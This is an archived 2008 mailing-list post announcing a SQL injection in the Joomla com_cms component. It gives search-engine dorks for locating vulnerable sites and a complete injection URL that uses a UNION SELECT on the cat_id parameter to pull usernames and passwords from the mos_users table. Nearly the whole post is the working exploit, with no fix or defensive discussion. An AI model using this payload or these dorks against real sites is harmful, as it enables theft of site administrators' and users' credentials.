joomla SQL Injection(com_cms)

hackturkiye . hackturkiye Thu, 21 Feb 2008 12:16:49 -0800

###############################################################

#


#   joomla SQL Injection(com_cms)

#

###############################################################

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MA&#304;L : [EMAIL PROTECTED]

#        

################################################################

# 

#  DORK 1 : allinurl:"com_cms"cat_id

# 

#  DORK 2 : allinurl: 

#

################################################################

   EXPLOIT : 


index.php?option=com_cms&act=viewitems&cat_id=-9999999/**/union/**/select/**/111,111,concat(username,0x3a,password),222,222,333,333/**/from/**/mos_users/*



################################################################

# [EMAIL PROTECTED]           i AM NOT HACKER      [EMAIL PROTECTED] 

################################################################

joomla SQL Injection(com_cms)

Reply via email to